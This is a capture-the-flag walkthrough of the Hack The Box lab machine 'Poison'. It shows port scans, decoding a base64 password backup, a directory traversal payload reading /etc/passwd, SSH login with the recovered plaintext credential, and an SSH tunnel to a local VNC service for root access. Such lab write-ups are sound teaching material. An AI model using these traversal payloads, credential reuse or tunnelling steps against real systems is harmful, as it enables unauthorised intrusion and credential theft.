Poison - wook413

![[Pasted image 20250616234510.png]] # Port Scanning - Nmap As usual, I started off with scanning all TCP ports and two ports are open. 22 and 80. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 21:06 CDT Nmap scan report for 10.10.10.84 Host is up (0.052s latency). Not shown: 53998 filtered tcp ports (no-response), 11535 closed tcp ports (reset) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 57.34 seconds ``` Next, I performed a detailed port scan against port 22 and 80. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 21:10 CDT Nmap scan report for 10.10.10.84 Host is up (0.053s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds ``` I can't forget to scan UDP ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 21:13 CDT Nmap scan report for 10.10.10.84 Host is up (0.066s latency). All 1000 scanned ports on 10.10.10.84 are in ignored states. Not shown: 807 open|filtered udp ports (no-response), 193 closed udp ports (port-unreach) Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds ``` --- # Footprinting This is what's hosted on port 80. Notice there are multiple sites to be tested. What would it possibly mean? ![[Pasted image 20250616211520.png]] `/ini.php` ![[Pasted image 20250616211810.png]] `/info.php` ![[Pasted image 20250616211833.png]] `/listfiles.php` ![[Pasted image 20250616211901.png]] `/phpinfo.php` ![[Pasted image 20250616211927.png]] `listfiles.php` looks like it's listing all of the files in the path. There's also a file named `pwdbackup.txt`. This is what's returned from the server when I inputted `pwdbackup.txt` in the field. ![[Pasted image 20250616220224.png]] By the look of it, it appears to be `base64` encoded. Let's try decoding it and get the original password. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ data=$(cat password.b64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data Charix!2#4%6&8(0 ``` **Let's breakdown the code above**: - `data=$(cat password.b64)` - read the file `password.b64` and save it to the variable `data` - `for i in $(seq 1 13); do ...; done` - the loop iterates for 13 times, and it decodes `data` in each iteration. - `data=$(echo $data | tr -d ' ' | base64 -d` - `echo $data`: output the current content of the data variable - `tr -d ' '`: remove any whitespace. - `data=$(...)`: save the decoded output to `data` variable again. **The password**: `Charix!2#4%6&8(0` # LFI I turned on interceptor in Burp Suite and captured the response after inputting some random strings in the input field `Scriptname`. The response says "No such file or directory in `/usr/local/www/apache24/data/browse.php`". It's telling us the exact location of the server and by the look of response, I feel directory traversal might work. Let's see if my feelings are right. ![[Pasted image 20250616212426.png]] This time I have inputted `../../../../../../../etc/passwd` and the server returned the file. Now we confirmed it definitely has directory traversal vulnerability. ![[Pasted image 20250616212651.png]] # Log into SSH with the found credentials Successfully logged into SSH server with the found credentials `charix:Charix!2#4%6&8(0` ```bash ssh charix@$IP ``` ```bash Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ <SNIP> charix@Poison:~ % whoami charix ``` Found `user.txt` flag! ```bash charix@Poison:~ % ls secret.zip user.txt charix@Poison:~ % cat user.txt eaac... ``` # Privilege Escalation When attempting to unzip `secret.zip` file, it tells us to type passphrase ```bash charix@Poison:~ % unzip secret.zip Archive: secret.zip extracting: secret | unzip: Passphrase required for this entry ``` I moved the file from SSH server to my local environment. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ scp [email protected]:/home/charix/secret.zip ./secret.zip ([email protected]) Password for charix@Poison: secret.zip ``` I reused the password that I found earlier and successfully extracted the file ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ unzip secret.zip Archive: secret.zip [secret.zip] secret password: extracting: secret ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ls -la secret -r--r--r-- 1 parallels parallels 8 Jan 24 2018 secret ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat secret [|Ֆz! ``` `netstat -a` reveals that **localhost is listening on port 5801 and 5901** ```bash charix@Poison:~ % netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 44 10.10.10.84.ssh 10.10.14.6.45220 ESTABLISHED tcp4 0 0 localhost.smtp *.* LISTEN tcp4 0 0 *.http *.* LISTEN tcp6 0 0 *.http *.* LISTEN tcp4 0 0 *.ssh *.* LISTEN tcp6 0 0 *.ssh *.* LISTEN tcp4 0 0 localhost.5801 *.* LISTEN tcp4 0 0 localhost.5901 *.* LISTEN udp4 0 0 *.syslog *.* udp6 0 0 *.syslog *.* ``` using `wget` locally in the SSH server, it appears there is an `index.html` running on port 5901 ```bash charix@Poison:~ % wget http://127.0.0.1:5801 --2025-06-17 06:12:34-- http://127.0.0.1:5801/ Connecting to 127.0.0.1:5801... connected. HTTP request sent, awaiting response... 404 Not found 2025-06-17 06:12:34 ERROR 404: Not found. ``` ```bash charix@Poison:~ % wget http://127.0.0.1:5901 --2025-06-17 06:12:55-- http://127.0.0.1:5901/ Connecting to 127.0.0.1:5901... connected. HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9 Length: unspecified Saving to: 'index.html' index.html [ <=> ] 12 --.-KB/s in 0s 2025-06-17 06:12:55 (1.08 MB/s) - 'index.html' saved [12] ``` # Local Port Forwarding Using Local Port Forwarding, I expect to access `127.0.0.1:5901` from my local Kali environment. ```bash ssh -L 1234:127.0.0.1:5901 [email protected] ``` logging into SSH server again ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ssh -L 1234:127.0.0.1:5901 [email protected] ([email protected]) Password for charix@Poison: Last login: Tue Jun 17 05:22:45 2025 from 10.10.14.6 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! <SNIP> charix@Poison:~ % ``` This creates a tunnel between our local port of 1234 to the victim's local port of 5901 so we can access the running application. I didn't know `5801` and `5901` are actually VNC ports, for remote desktop access. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc 127.0.0.1 1234 RFB 003.008 ``` We can connect to the vncserver on our local port of 1234 using the following syntax ```bash vncviewer 127.0.0.1:1234 ``` vncviewer asks for password. I reused the password but this time it didn't work. Let's use the encrypted password we got from the zip file. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ vncviewer 127.0.0.1:1234 Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Password: Authentication failed ``` `man vncviewer` reveals there's actually `-passwd <passwd-file>` option where you can use a file as password. ![[Pasted image 20250616233819.png]] `vncviewer 127.0.0.1:1234 -passwd secret` opened up a vncviewer named `TightVNC` and I'm already logged in as root in the viewer! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ vncviewer 127.0.0.1:1234 -passwd secret Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Authentication successful Desktop name "root's X desktop (Poison:1)" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding ``` found `root.txt` flag! ![[Pasted image 20250616234246.png]]